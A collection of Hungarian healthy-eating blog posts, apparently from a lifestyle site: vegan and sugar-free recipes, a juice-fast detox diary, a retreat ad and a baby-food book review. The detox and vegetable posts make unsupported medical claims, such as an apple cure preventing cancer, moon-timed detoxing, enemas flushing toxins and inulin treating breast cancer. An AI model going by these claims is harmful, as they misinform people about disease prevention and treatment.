Gyorsaprító gépben az aszalt gyümölcsöket összeaprítjuk jó alaposan. Hozzáadjuk az almadarabokat és némi vizet, tovább aprítjuk az aprítógéppel. Ehhez a masszához keverjük az őrölt lenmagot, a kókuszreszeléket és az aprított vagy darált diót és a reszelt narancshéjat. Ha szükséges, vizet adunk hozzá, ha túl ragadós a tészta, akkor őrölt lenmagot/darált diót/kókuszreszeléket szórunk hozzá. Ha egy nagy gombócot tudunk formálni belőle, akkor elég tömör az anyag. Szív alakú jégkocka tartóba (szilikon) nyomkodjuk, majd 20-30 percre a fagyasztóba tesszük, hogy jól megdermedjen, ezután kinyomjuk a formákból. Csoki- vagy karobmázba forgatjuk. Hűtőben tároljuk. Csokimáz helyett darált mogyoró/dió-ba is hempergethetjük.
A máz elkészítése:
A kókuszzsírt megolvasztjuk (ha eleve nem folyékony), beleszórjuk a karobport, hozzáadunk ízlésünknek megfelelő mennyiségű édesítőt (nádcukor, nyírfacukor, stb.) Alacsony lángon forráspontig keverjük, majd egy kevés növényi tejet is hozzáadunk. Még kevergetjük, míg újra forrni kezd, lezárjuk, kihűtjük, majd a süteményt bevonjuk vele.
Tavaszi méregtelenítés. A léböjt 2. napja
Reggel az óra csörgésére ébredtem. Nagyon éhes voltam . Elkészítettem a szokásos májöblítő turmixot és utána megittam egy csésze dió teát. "Benyaltam" 1 kk. mézes szűzbogáncsos almarostot, az nagyon jól esett. A mai nap az orvosnál folytatódott. Tegnap a nagylányom olyan ügyesen lépett, hogy bokaszalag húzódása lett. Majdnem 10 óra lett, mire végeztünk, már ekkor megint nagy éhség tört rám. Hazaérve megittam egy csésze alma-cseresznye italt, melyet fahéjjal és gyömbérrel ízesítettem. Frissen préseltem répa-káposzta-zeller és fehérrépát , amely ismét kiadott egy csésze itókát. A megmaradt rostból készítettem egy zöldséglevest , melybe még hagyma és fokhagyma is került. A végén jó csípős lett, mert tettem bele egy kevéske chilit is. Délután ittam még vizet, teát és alma-körte levet is. A gyümölcs- és zöldségeleveket minden esetben hígítom vízzel!! Este még "ettem" ismét egy adag zöldséglevest és még 1 csésze tulsi tea is lement. Érdekes, hogy nem vagyunk fáradtak . A párom még mondta is, hogy SOKKAL energikusabb, már csak az evés hiányzik neki. Mint a forró sivatagban, mikor vizet lát az ember, hát a párom másra sem tud gondolni, mint a sült halra vagy a kacsacombra. Pedig nem nagy húsevő, hetente 1-2x eszik, de most nagyon kívánja. Hát... még kell rá várni egy kevéske időt. Én is nagyon jól érzem maga, délután még gyomláltam is egy kicsit a kertben. Érdekes, hogy a gaz mindig gyorsabban nő, mint a vetemény... Holnap az utolsó nap... A párom kért, hogy holnap újítsak be valami új itallal, mert már unja az eddigit. Na jó, de mit? Elsősorban a sósat kívánjuk, bár az édes jobban telít... Na, majd holnap meglátjuk... Összesítés: Étel - italMennyiségREGGELÁllott víz 5 dl1,5 literMájöblítő turmix 5dl (+30 ml emóció)Dió tea 5 dl2 szem huminiqum2 szem alga1 kk. mézes szűzbogáncsos almarostDélelőttalma-cseresznye-meggy LÉ 5 dl1,1 literzöldséglé 6 dlEbédZöldség leves LÉ 5 dl0,5 dl20 ml Supra balanceDélutánvíz 6 dl2,1 literTulsi tea 5 dlalma-körte LÉ 2x5 dlVacsora2 szem alga0,5 dl2 szem huminiqumZöldség leves LÉ 5 dlEsteGyömbéres tulsi tea 5 dl0,5 liter1 kk. mézes szűzbogáncsos almarost 5,7 liter folyadékot ittam a mai nap folyamán. Már csak 1 nap, és ehetünk...
Tavaszi méregtelenítés. Első nap
Ez a nap sem kezdődik másképp, mint szokott. Csak másképp folytatódott. Fél 6-kor csörög az óra, mert el kell készülni, mire a gyerekek ébrednek. Megiszom a szokásos pohár vizemet a 2-2 szem algával és huminiqummal. A kedvencem a mézes almarost, finom, édes, és jót tesz a vércukorszintnek is. Ha nem eszek, akkor gyakran szédelgek, így ez ilyenkor jó szolgálatot tesz. Szóval a reggeli szokásos teendőm: gyógytea készítés, (ma dió teát forráztam) majd megfőzöm a gyerekeknek és a páromnak a kását. Ma zabkása volt soron. A frissen pelyhesített zabból sokkal sokkal finomabb a kása, mint bolti pehelyből. Igaz, egy kicsit tovább tart elkészíteni, de megéri. Én mindig vízbe főzöm meg, teszek hozzá egy kis mazsolát és kókuszt. Csipet sót és vaníliát. Kb. 20 perc főzésre van szükség. A kását én mindig sűrűre főzöm, és mellé öntve mandulatejet kanalazunk. Ezt is minden reggel frissen készítem el. Megszórva dióval, kókusszal és egy kis reszelt csokival. Majd jöhet a grépfruit tisztítása, mely a májöblítő turmix alapja. Mindent beleteszek a kehelybe, majd alaposan összeturmixolom. Így az olaj szépen elegyeledik a lével, nem fog a tetején úszkálni. A gyömbért és a fokhagymát belereszelem, hogy ne maradjon darabos. Tehát reggeli előtt 1,5 liter folyadékot iszok. Én nem eszek reggel kását, mert most itt a sok friss gyümölcs, ezeket jobban kívánom. Úgyhogy megettem majdnem 1 kg cseresznyét . Ezután még bekanalaztam 1 evőkanál útifűmaghéjat is. A páromnak a sok folyadék miatt 10 óra utánra tolódott el a reggeli, mert nem volt éhes. Így az ebéd is csúszott. Szóval a délelőtt folyamán még 2x 5 dl folyadék ment le. Az egyik lapacho tea volt, a másik pedig karotin koktél, melybe 1 evőkanál búzafűport is tettem. Az ebéd Pálma piláfja volt. Én egy kicsit változtattam rajta, így készítem el. Nagyon nagyon bejött nekem (és a páromnak is). Jól esik a csípős, és a csicseriborsó is nagy kedvenc. A délután folyamán minimum 2x5 dl folyadék elfogyasztása a cél. Ez azért problémás nekem, mert 3 körül megyek a gyerekekért és csak este érek haza. Úgyhogy flakonok elő, és indulás. Megittunk egy gyömbéres tulsi teát (imádom a szálas teákat) és 5 óra körül egy zöld turmixot . Vacsorára egy egyszerű ételt készítettem, melyet csak darabolni kell, és mehet a sütőbe. Kb. 1 óra, és tálalható a vacsora. Mostanság sikerül hazai batátához hozzájutnom, így gyakran kerül az asztalra. Úgyhogy ma is ez készült. Van, amikor kockára vágom, és olyan is, amikor szeletelem az alapanyagokat. És a zöldbab helyett brokkoli is szokott bele kerülni. Emellé még készítettem egy nagy adag salátát is. Ja, és megszórtam pirított tökmaggal és szezámmaggal. Este lefekvés előtt a szokásos csésze tea, a beszedni valók. Nem is volt olyan szörnyű ez a nap.
Nutellás csiga
Csiga-biga gyere ki / Ég a háza Dideki.
Lázár Ervin Fruzsina nevű lánya még nagyon kicsi volt és így énekelte a versikét, amiből aztán megszülettek Berzsián és Dideki történetei. Nos ennek (a képen látható) csigáknak nem ég a háza, mert már mind elfogyott. Annyira finom volt. Közzé is teszem a receptjét - alant olvasható.
A recept:
Hozzávalók:
- 1 csomag élesztő
- 4 dl növényi tej
- 10 dkg kókuszzsír
- 35 dkg fehér liszt
- 15 dkg teljes kiőrlésű liszt
- 10 dkg őrölt zabpehely
- 2 ek nyírfacukor/nádcukor/kókuszvirágcukor, stb
- 2 ek kevés vízben áztatott őrölt lenmag
- csipetnyi só
- vanília
+ házilag készített nutella
Elkészítés:
Egy tálba vagy a kenyérsütő üstjébe belemorzsoljuk az élesztőt, hozzáadunk 2 ek édesítőszert (nyírfacukrot használtam), majd felöntjük a kézmeleg növényi tejjel. (A növényi tejet most rizstejporból készítettem el.) Várunk 1-2 percet, majd a fenti sorrendben hozzáadjuk a többi hozzávalót. Kenyérsütő gépünkbe tesszük és a dagasztás/kelesztés programra állítjuk. Ennek híjával fakanállal vagy a kezünkkel úgy gyúrjuk össze a tésztát, addig dagasztjuk kezünkkel, míg a táltól az elválik és hólyagocskák jelennek meg a dagasztás során. Ha kézzel dolgoztunk, meleg helyen konyharuhával letakarva kelesztjük. A kenyérsütő a program szerint elvégzi ezt.
A kész tésztát lisztezett deszkán kinyújtjuk, megkenjük jó alaposan házilag készített nutellával, és mint a kalácsot feltekerjük, majd szeleteket vágunk belőle, amiket sütőpapíros tepsire fektetünk. Közepes lángon megsütjük. A sütés utolsó 10 percében egy kis édes vaníliás növényi tejjel megkenjük a csigákat.
Finomságos édes falatok vendégvárónak vagy reggelire a gyerekeknek, a család többi tagjának is.
Epres-gesztenyés desszert
Végre itt az eperszezon! :) Már alig vártam, hogy lehessen friss, illatos hazai epret kapni. Az epret nemcsak finom ízéért fogyasszuk, hanem gondoljunk arra is, hogy tele van antioxidánsokkal és C-vitaminnal. Ennek köszönhetően rákmegelőző hatása van, késlelteti az öregedést, valamint segíti a vas felszívódását. Viszont nagyon fontos az alapos mosás! Hozzávalók: 4 adaghoz fél kg eper 2 cs. gesztenyemassza 2,5 dl szójajoghurt kevés étcsokoládé reszelve Az elkészítés nagyon egyszerű. Csak egy robotgép szükséges hozzá. 1. Az epret megmossuk, majd betesszük a robotgépbe, és az éles kések segítségével apró darabokra turmixoljuk. 2. A gesztenyemasszát és a joghurtot is beletesszük a gépbe, és a krém készítő lapáttal egy teljesen homogén masszát kaphatunk. Ha natúr masszát vettünk, akkor édesíthetjük egy kevés sziruppal, vagy nyírfacukorral. Ani Tisztán, tudatosan!
Egynapos elvonulás (jóga, meditáció, főzés)
2014. május 28. Lét-tudatos konyha
Lét-tudatos Életmód Központ - harmóniában a természettel Zöld környezet, friss levegő, harmónia. Árnyas fákkal körülvett, pozitív energiákat sugárzó hely, egy kis házikóval. Kiváló atmoszférát biztosít szabadtéri jógára, meditációra. EGYNAPOS ELVONULÁS (jóga, meditáció, főzés) Egynapos programunk: - Salaktalanító gyógytea fogyasztása - Hatha jóga öngyógyító gyakorlatokkal - Vegetariánus ebédkészítés (leves, főétel, édesség) - Meditáció Időpont: június 7. szombat 8-18h Jelentkezési határidő: június 2. Ára: 6000 ft Jelentkezés és bővebb információ: renata.kalman_kukac_lettudatos.com tel.: 06 30 913 65 76
Kakaós zabkása
Néha boltban szoktam venni kakaós zabkását (porridge – Müller), de sokkal egészségesebb, ha házilag, otthon készítjük.
Én kakaósan szeretem a legjobban, de lehet pl. almával, és egyéb gyümölccsel (pl. aszalt gyümölccsel) is készíteni.
Hozzávalók: 2 dl növényi tej (pl. rizstej – én azt használok hozzá), 3 púpos evőkanál zabpehely, édesítésnek méz vagy xilit, kb. egy teáskanálnyi kakaópor (ízlés szerint). A teteje ízlés szerint díszíthető. (Én most virágport, mandulát, kesudiót és kókusz chipset szórtam rá.)
Elkészítés: A zabpelyhet a növényi tejben felfőzzük, hozzáadjuk a kakaóport, majd az édesítésnek szánt anyagot. Főzéskor a zabpehely egy kis nyákot ereszt és megdagad, így besűrűsödik.
Hamar készen van, laktató étel.
Tipp: Kakaópor helyett jó minőségű csokoládéval is készíthető, mely elolvad benne!
Jó étvágyat!
Tavaszi méregtelenítés 2014.
A párommal nekikezdünk a tavaszi méregtelenítésnek. Eddig is teljesértékűen táplálkoztunk, viszont ezt most kiegészítem gluténmentességre és tejtermékmentességre. Amennyiben méregtelenítést végzünk, nagy hangsúlyt kell fektetni a máj, a bél és a vese tisztítására. Ugyanis a tisztulás során felszabaduló méreganyagokat ezek a szervek fogják kiválasztani. A máj sokszor túlterhelt a sok toxin és a mérgek miatt, a gyógyszerek, fogamzásgátlók, szintetikus kozmetikumok, az alkoholfogyasztás szintén ártanak a májunknak (az ivóvízről nem is beszélve). Számos gyógynövényt alkalmazhatunk a máj tisztítására: máriatövis (olaja is jó), kis ezerjófű, katángkóró, gyermekláncfű, apróbojtorján (minden ami keserű, a májat tisztítja). De ihatunk grépfruit vagy almalevet is. Emellett fontos a bél tisztítása. ,,A halál a bélben lakozik"- mondta Paracelsus, a középkor egyik legnagyobb orvosa. A hosszú évekig, évtizedekig tartó helytelen étrend következtében a belekben felhalmozódott mérgek következménye pl. a székrekedés, bélgyulladások, aranyér. A méregtelenítés során feloldódnak a toxinok, amelyeket a bélrendszeren keresztül távolítja el a szervezet. Már ha tudja. Gyenge perisztaltika, székrekedés, bélflóra hiánya miatt ezek a mérgek visszaszívódhatnak, ami nagy fájdalommal és rosszulléttel járhat. Használhatunk pl. útifűmaghéjat vagy lenmagot a bél tisztítására. De beöntést is végezhetünk. Havonta egy nap almakúra tisztán tartja a beleket. Ezzel meggátolhatjuk a bélgyulladásokat és a rákos elváltozásokat. A béltisztítással párhuzamosan viszont nagyon fontos a bélflóra regenerálás. Hiszen az az immunrendszer fontos része. A vese tisztítása is rendkívül fontos, mivel a vizelet kiválasztását végzi a szervezetben, a vérből kiszűri a felesleges vizet és a káros anyagokat. A méregtelenítés során fontos a bő folyadékfogyasztás (2-4 liter), valamint igyunk valamilyen vesetisztító, vizelethajtó teát, pl. aranyvesszőt, nyírfalevélt, zsurlót vagy csalánt. A petrezselyem levél is nagyon jó vízhajtó, fertőtlenítő. A görögdinnye jól átmossa a vesét. A tisztító kúra során érdemes figyelembe venni a szervezet belső ritmusát . A belső tisztulás ideje hajnali 4 óra és déli 12 óra közé esik. Ilyenkor ne terheljük a szervezetet feleslegesen emésztéssel. Viszont igyunk sok vizet, teát, hígított zöldség- vagy gyümölcslét. Ehetünk érett gyümölcsöt is, mely víztartalma hasznos a belső tisztuláshoz, enzimjei és bázisos ásványi anyagai elősegítik a folyamatot. 12 és 20 óra között van a táplálékfelvétel ideje és az emésztés a gyomorban és a vékonybélben. 20 órától hajnali 4 óráig tart a felszívódás időszaka. A méregtelenítést időpontját érdemes fogyó hold időszakára ütemezni. A mi méregtelenítésünk alapja ez alapján fog történni. A következő részben leírom, hogy milyen gyógynövényeket, étrendkiegészítőket vetek be annak érdekében, hogy a méregtelenítés zökkenőmentes legyen. Folytatás: - Tavaszi méregtelenítés: milyen kiegészítők (teák, étrendkiegészítők) szükségesek ahhoz, hogy a méregtelenítés megfelelő legyen? -
Csicsóka krémleves pirított répakarikákkal
Ugyan bizonyos éttermek étlapjára már fel-felkerült egy-két csicsókából készült étel, de úgy gondolom, még mindig nem terjedt el igazán eme remek étek. Néhány jó tulajdonságával szeretnék most kedvet adni arra, hogy ne féljünk tőle, vegyük fel a saját készítésű ételeink listájára. Először is, azoknak, akiknek kertjük van, érdemes csicsókát termeszteni, mert meglehetősen igénytelen, sőt a fagyok beállta előtt nem szükséges a földből kihúzni. Férjem édesanyja is így tett, tavasszal kaptunk tőle így néhány kiló frissen kihúzott csicsókát. Mindig csak akkor kell kihúzni, amikor felhasználásra kerül. Azt is mondják, hogy az egyszer elvetett csicsókát nem könnyű kiirtani. De ez se tántorítson el bennünket, hiszen fogyasztása kifejezetten előnyös pl. cukorbetegségben szenvedők részére. Magas rosttartalma két szempontból említendő: 1, Nem érdemes túlzásba vinni az egy alkalommal történő fogyasztását, mert könnyen puffadást idézhet elő (ez talán megelőzhető, ha az első és utolsó falatoknál őrölt lenmagot fogyasztunk hozzá). 2, Gátolja a szénhidrátok és hizlaló tápanyagok felszívódását. Mindemellett rendkívül laktató étel. Burgonyához képest mintegy ötször több rosttartalma van. Ásványi anyag tartalma is jelentős: kálcium, kálium, magnézium, foszfor, cink. Vitamintartalma: B1, B2, Niacin, C-vitamin, Bétakarotin. Két betegség kapcsán tennék még róla említést, amihez alapul a wikipédia (is) szolgál:
Mellrák esetén fogyasztása az alábbiak miatt javasolt:
Az étrendbe építhető inulin fogyasztása rizikómentes, és könnyedén alkalmazható a rákterápiában. A rákellenes hatás a Lactobacillus béta-glucuronidáz-gátlásán alapul. A béta-glucuronidáz a székletben található enzim a szervezet detoxikáló tevékenységét gátolja abban, hogy az ösztrogén egy kevésbé aktív, illetve kevésbé toxikus formában estriollá alakuljon át. Az ösztrogén toxikus formája ugyanis a mellrák rizikóját növeli. Az inulin a bélflóra normalizálása útján az ösztrogén legtoxikusabb formáját kiiktatja.
Cukorbetegség és elhízás esetén:
Cukorbetegség esetében az inulin mint szénhidrát-energiaforrás azért jelentős, mert a vércukorszintet tartós fogyasztás esetén sem emeli. Az inulin metabolizációjához nincs szükség inzulinra, sőt az inzulinfüggőséget is csökkenti, s a vércukorszint beállítását megkönnyíti.
A csicsókagumó fogyasztása azért is előnyös a mai, elhízáson alapuló népbetegségek megelőzésében, mert az inulin molekulahosszúsága miatt nem reszorbeálódik, emberben pedig (az inulináz enzim hiánya miatt) nem bontódik és legfeljebb a vastagbél baktériumflórája képes valamelyest feldolgozni. Így az inulin az emberi táplálkozásban csak ballasztanyagként jön számításba és fogyaszt. A burgonya mellett és helyett mind a népélelmezésben, mind az elhízottak és cukorbetegek diétájában felhasználható és hasznosítható, sőt e betegek még többet is fogyaszthatnak belőle.
Mindezek mellett a gumó egyedülálló regeneráló, hidratáló, bőrnyugtató, bőrtápláló és frissítő hatása miatt a kozmetikumként is hasznosítható. Most viszont egy étel-recept következik, amit elkészíteni rendkívül egyszerű:
A recept:
Hozzávalók:
- 50 dkg csicsóka
- 1 közepes szem krumpli
- 2-3 gerezd fokhagyma
- 3 dl növényi tej
- víz
- ételízesítő
- só
Elkészítés:
A csicsókát dörzs-szivaccsal és vízzel megtisztítjuk, apró kockákra vagy szeletekre vágjuk. A krumplit meghámozzuk, szintén felaprítjuk. Egy lábosba tesszük mindkettőt és f elöntjük annyi vízzel, hogy ellepje. Adunk hozzá úgy 1 kiskanálnyi sót és puhára főzzük. Ha megpuhult, összeturmixoljuk úgy, hogy közben fokozatosan adjuk hozzá a a fokhagymákat, a főtt csicsóka megmaradt levét és növényi tejet. Még egy kevés házi ételízesítővel, ha szükséges, megszórhatjuk, forralunk rajta egyet és kész is a csicsóka krémlevesünk. A répás levesbetét a következőképpen készül hozzá: Meghámozzuk a répákat, nagyon vékonyan (akár uborkareszelőn) felaprítjuk karikára. Enyhén kókuszzsíros vagy olajos serpenyőben megpirítjuk a répakarikákat. Tálaláskor egy kis tálkába tesszük a pirított répakarikákat, majd kanállal a levesünkbe szórjuk. Opcionálisan a főzés utolsó szakaszában aprított medvehagymát is adhatunk hozzá.
Csokis-epres torta (cukormentes, nyers)
Hosszú félig meddig külső kényszer-szünet (a technika sorozatban felbukkanó csínjai) után egy "költeménnyel" jelentkezem. A torta szintén megrendelésre készült. Mondhatni, hozzáadott cukrot nem tartalmaz. Sem nyírfa-, sem iparilag előállított gyümölcs-, sem kókuszvirág cukrot, sem mézet. Tulajdonképpen nyers kategóriába tehető, bár a zabpehely készítési eljárás miatt kicsit mégis tétovázva írom le, hogy nyers. Vitaminbank szerint: "A gabonapelyheket gőzöléssel és hengerek közötti lapítással állítják elő, legtöbbször a teljes gabonaszemből, ezért az egész gabonaszem összes tápanyagait tartalmazzák. Biológiai értékük jelentős. A zabot, az árpát, a hajdinát, és a kölest hántolják pelyhesítés előtt, a búza és a rozs azonban héjasan pelyhesíthető." Nyers vagy sem a képen szereplő gyönyörűség, meg kell hagyni, nem csak kinézetre kívánatos. Viszont előnye, hogy tömény édesség, így nem nagyon lehet sokat enni belőle. Másik előnye, hogy gyorsan kész. Arról nem beszélve, hogy jönnek a meleg nyári napok, amikor a sütőt nem szívesen kapcsoljuk be, akár más gyümölccsel díszítve is elkészíthetjük, ajándékba, hétvégi desszertnek, vendégváró falatnak.
A torta-alap receptje:
Hozzávalók:
1/2 kg darált zabpehely
15-20 dkg kókuszreszelék
víz
3 érett banán
Elkészítés:
A zabpelyhet és az enyhén megpirított kókuszreszeléket egy tálban összekeverjük, villával szétnyomkodott banánt keverünk hozzá, és annyi vizet öntünk rá, hogy az egészből egy nagy gömböcöt, egy golyót tudjunk gyúrni. Frissen tartó fóliával egy nagyobb tortaformát kibélelünk (a fólia nagyobb legyen, mint a forma, a magasabb peremét is érje) és a zabpelyhes alapot beleformázzuk. Jól belenyomkodjuk. Az alábbi csokikrémet elkenjük rajta, majd ötletünk szerint dekoráljuk. Ahogy a képen is látható, eper került a tetejére.
A csokikrém receptje:
Hozzávalók:
- 2 db érett nagy avokádó
- 2-3 dkg karobpor (mivel megrendelésre készült, kakaót használtam - abból több kell -, bár a karob egészségesebb)
- 5 dkg kókuszolaj
- 12-14 dkg datolya, meleg vízben áztatva legalább fél óráig
- 1 csipet tengeri só
Elkészítés:
Vegyük elő a turmixgépet (vagy egy erős aprítógépet) és a fentieket mindet, ebben a sorrendben tegyük bele. Indítsuk el, és hamarosan látni fogjuk hogy milyen fantasztikus krémet kapunk végeredménynek. Olyan krémet, mint a csokitorták csokikrémje. A kész krémet egyszerűen elkenjük a zabpehelyből készült tésztán, ennek a tetejére jöhetnek az eperszemek. Hűtőben tároljuk tálalásig. Tálalás előtt a fóliával kiemeljük a formából, lehúzzuk alóla a fóliát, az oldalát reszelt (előtte megmosott) narancshéjjal szórjuk meg. Egy szép tálcára téve tálalhatjuk is. Nagyon kiadós torta olyan értelemben, hogy nem sokat bír az ember belőle enni még akkor sem, ha édességfüggő.
Lét-reform gesztenyeszív
2014. május 15. Mindennapi ételeink
A Lét-reform Original Kft. jóvoltából kaptunk bio, reform süteményeket, kekszeket és kenyérféléket, amelyeket, mivel finomak és egészségesek, úgy gondoltam, megosztok a blog olvasóival. A cég 15 éve foglalkozik reform-és biotermékek gyártásával. Nem használnak állati eredetű terméket, édesítésre mézet, gyümölcsleveket használnak, a fehér lisztet teljes kiőrlésű, tönköly, rozs, zabliszttel váltják ki. Zsiradéknak hidegen sajtolt napraforgó olajat, ill. szezám-len-olívaolajat adnak az ételekhez. A termékeiket bio-és reformboltokban vásárolhatjuk meg, ill. a budapesti ÖKO piacon. Az elsőként a gesztenyeszíveket kóstoltuk. Összetétele: natúr gesztenye, alma, karobmáz (karob, növényi margarin, tápióka). Ízre nagyon kellemes, nem túl édes, a karobmáz finom, roppanós. Egyedüli hibája, hogy nem elég egy csomag :-)
Karoböntetes kókuszkocka
2014. május 14. Mindennapi ételeink
Ez a kókuszkocka nagyon jó találmány, sajnálom, hogy Fannink még nem csemegézhette, megettük mi. Önmagában is tökéletes, de ezzel a karobos mártogatóssal sajnos abbahagyhatatlan... Hozzávalók: 1 zacskó kókuszkocka -- 2 ek. karob 5 dl víz 4 ek. kukoricakeményítő 2 dkg datolyaszirup 2 kk. kókuszzsír Elkészítés: A vizet (3 ek. kivételével) feltesszük főni, hozzáadjuk a kókuszzsírt, felforraljuk. A maradék vízzel kikeverjük a keményítőt és a karobot. Ezt hozzáöntjük a forrásban levő vízhez. Sűrűre főzzük, majd sziruppal édesítjük. Ebbe mártogatjuk a kókuszkockákat.
Kókuszos mandulás granola
2014. május 14. Zizi kalandjai
Hónapok óta szinte majdnem minden reggel zab- vagy rizspehely kását eszünk reggelire. Először is a zab tejserkentő, tehát jól jött, amikor az anyatej serkentése volt a cél. Télen jól jön a melegítő hatása is, rengeteg mindennel fel lehet dobni (friss és szárított gyümölcsök, magok), meg finom, szóval mi nem untuk még meg. Sőt, Ádi sem, aki többnyire kását reggelizik úgy, ahogy mi.
Aztán eszembe jutott a granola… hogy már milyen régen ettünk és megkívántam. Talán váltani kellene a kását valami ropogósra – gondoltam. Eddig kétfélét készítettem, egyszer sütőtököset, egyszer pedig cukormenteset. Most az itthon talált alapanyagokból dobtam össze egy változatot és azt kell mondanom, ez lett a legfinomabb. Annyira finom, hogy most is, amikor ezt a bejegyzést írom, granolát ropogtatok és majszolom hozzá a 70%-os étcsoki kockámat. Mennyei éjszakai desszert! Ha így folytatom, hamarabb el fog fogyni, mint gondoltam.
Ki is találtam, hogy néhány hét múlva ajándékba is elkészítem, amikor Londonba utazunk és a vendéglátóinknak házilag készített gasztro ajándékot szeretnék vinni + valami finom magyar alapanyagot (például őrölt pirospaprikát Szegedről). Szóval egy kis kihagyás után újra repülőre ülünk, I. és én sokadszorra, azonban Ádinak ez lesz az első repülőútja. Kicsit izgulok, de remélem tetszeni fog neki.
Percek alatt összekeverhető a granola, majd a sütőben kb. 15-20 perc alatt megsül. Nagyon gyorsan készen lesz, érdemes kipróbálni. Tudjuk, hogy pontosan milyen alapanyagok vannak benne és saját ízlésünk szerint édesíthetjük. Én kevés juharszirupot kevertem hozzá, de ez lecserélhető mézre, rizsszirupra vagy bármilyen más folyékony édesítőszerre, de akár el is hagyhatjuk és akkor teljesen cukormentes lesz. Az alapanyagokat ízlésetek és a kamrában található magok alapján variálhatjátok… végtelen sok lehetőség rejlik a granolában. Én ilyen vegán citromos joghurtba kevertem bele, de növényi tejjel és gyümölcsökkel (eper, málna) is kiváló!
Kókuszos mandulás granola
Hozzávalók:
- 2 bögre zabpehely
- 1/2 bögre napraforgó mag
- 1/3 bögre tökmag
- 1 bögre mandula, kicsit felaprítva
- 1/2 bögre kókuszreszelék
- 1/3 bögre juharszirup
- 1/2 teáskanál só
- 4 evőkanál kókuszzsír (szobahőmérsékletű)
Melegítsük elő a sütőt 175 fokra. Egy nagy tepsit béleljünk ki sütőpapírral.
Egy tálban keverjük össze a száraz alapanyagokat: zabpehely, napraforgó mag, tökmag, mandula, kókuszreszelék, só. A végén adjuk hozzá a juharszirupot és a kókuszzsírt és jól keverjük el. Borítsuk rá a tepsire és kanállal egyengessük el, hogy mindenhova egyformán jusson. Süssük kb. 6-8 percig, keverjük át, majd süssük újabb 8-10 percig, amíg aranybarna lesz (ellenőrizzük folyamatosan, mert sütő függő, hogy milyen hamar lesz kész).
Üvegben/dobozban tartva hetekig eláll. Bár nem fog addig tartani, ezt garantálom!
Táplálj helyesen édesanyám! (3. rész)
2014. május 10. Zizi kalandjai
Újabb baba receptek, remélem nem gond! Ígérem jön majd a felnőtteknek is recept! A következő olyan lesz, de addig még egy kis hozzátáplálás…
Dóra blogját elég régóta követem. Lila Füge, ki az, aki nem ismeri? 2013 tavaszán jelent meg második könyve a Születéstől Születésnapig (Az első 12 hónap étrendje). Meglepődtem, hogy igen kevés helyen olvastam a könyvről, nagyobb beharangozást vártam. Ezért örültem, amikor a Boook Kiadó küldött a könyvből egy példányt. Örömmel vetettem bele magam az olvasásba pont egy sétáltatás alkalmával, amikor szerencsémre Ádi szunyókált két óra hosszán keresztül, így volt egy kis idő magamra és olvashattam végre egy könyvet.
A bevezetőn (alapszabályok, szoptatás, családi étkezés szabályai, bio vagy nem, mikor kezdjük a hozzátáplálást, eszközök) gyorsan átrágtam magam, aztán jöttek a receptek kéthavi bontásban:
- 5-6. hónap – Egyszerű pürék
- 7-8. hónap – Összetett pürék
- 9-10. hónap – Darabos ételek
- 11-12. hónap – Igazi fogások
A végén pedig egy rövid lezárás, hogy hogyan is tovább egy éves kor után.
A receptek színesek, kreatívak, gyorsan elkészíthetők és nagyon sok köztük a vegetáriánus, vegán (számomra ugye ez is fontos). A legfontosabb alapszabályok közül kiemelném a következőket:
- a gabona részben teljes kiőrlésű legyen
- rizsből csak barnát használjunk
- gyümölcsből, zöldségből lehetőség szerint a nem vegyszerezett, bio változatot válasszuk
- ne használjunk cukrot és ne sózzunk az ételt (én minimális – késhegy felénél kevesebb – sót néha tettem Ádi ételébe 10 hónapos kora után, de amióta ezt olvastam, azóta nem teszek sót az ételébe)
- tejet csak később, egy éves kor után adjunk a babának
- az alapanyagok frissek és jó minőségűek legyenek
- néhány dolog, amit egyáltalán nem javasol egy éves kor előtt adni: tejszín, juhtúró, juhsajt, méz, tojásfehérje, aprómagvas gyümölcsök (málna, földieper, szeder, egres, kivi), olajos magvak
A könyvet gyermekorvosi (Dr. Miklós Anna) és dietetikusi (Schmidt Judit) közreműködéssel írta Dóra, jórészt saját tapasztalatai alapján és a legújabb táplálkozástudományi ajánlások mentén. Szerintem nagyon jó a felépítése és segít kiigazodni a hozzátáplálás útvesztőjében. Én már jó néhány receptet kipróbáltam belőle és a legnagyobb kritikus, Ádi, igen jól fogadta. Bár mostanában bélpoklos korszakát éli és mindent megeszik. Ilyen jól evő babát kívánok mindenkinek!
Spárgás babarizottó
Hozzávalók:
- 25 g rizspehely (ez kb. 3-4 evőkanálnak felel meg)
- 2 szál zöldhagyma
- 1 evőkanál extra szűz olívaolaj (Dóra vajat használ, én lecseréltem hidegen sajtolt olívaolajra)
- 4 szál spárga (zöld vagy fehér)
- kb. 50 ml rizstej (vagy anyatej, én mindig rizstejet vagy mandulatejet használok főzéskor)
A rizspelyhet forrásban lévő vízben puhára főzzük. A zöldhagymát megtisztítjuk, vékonyra karikázzuk. A spárgát alaposan meghámozzuk (főleg a fehér spárgára igaz ez), hogy ne maradjon fás része, majd feldaraboljuk.
Egy kis lábasban felhevítjük az olívaolajat, rádobjuk a hagymát és egy percig dinszteljük. Hozzáadjuk a spárgát és 3 evőkanál vizet. Fedő alatt 5 percig főzzük, amíg a spárga megpuhul. Összekeverjük a főtt rizspehellyel, pürésítjük és annyi rizstejet adunk hozzá, amennyitől a babának megfelelő állagú lesz.
A rizottó nagy sikert aratott, én egy kevés petrezselymet is adtam hozzá a végén, csak úgy nyersen belekevertem. Hihetetlen, hogy sózás nélkül mennyire érezhető a spárgának és a petrezselyemnek is az íze. Igen finom étel és enyhén édeskés, így nem csodálkozom, hogy Ádinak nagyon ízlett.
A másik recept pedig egy vöröslencse krémleves. Először főztem Ádinak vöröslencsét, de ezt is jól fogadta. Ebből is könnyen készíthetünk ebédet anyának is, akárcsak a rizottó esetében.
Vöröslencse sárgarépával és almával
Hozzávalók:
- 50 g vöröslencse
- 1 nagyobb sárgarépa
- 1 nagyobb alma
- 1 babérlevél
- 2 szál vöröshagyma
- 2 evőkanál extra szűz olívaolaj (Dóra vajat használ, én lecseréltem hidegen sajtolt olívaolajra)
- kb. 100 ml rizstej (vagy anyatej, én mindig rizstejet vagy mandulatejet használok főzéskor)
A sárgarépát és a hagymát megtisztítjuk, vékony karikára vágjuk. Az almát meghámozzuk, magházát eltávolítjuk, a húsát felszeleteljük.
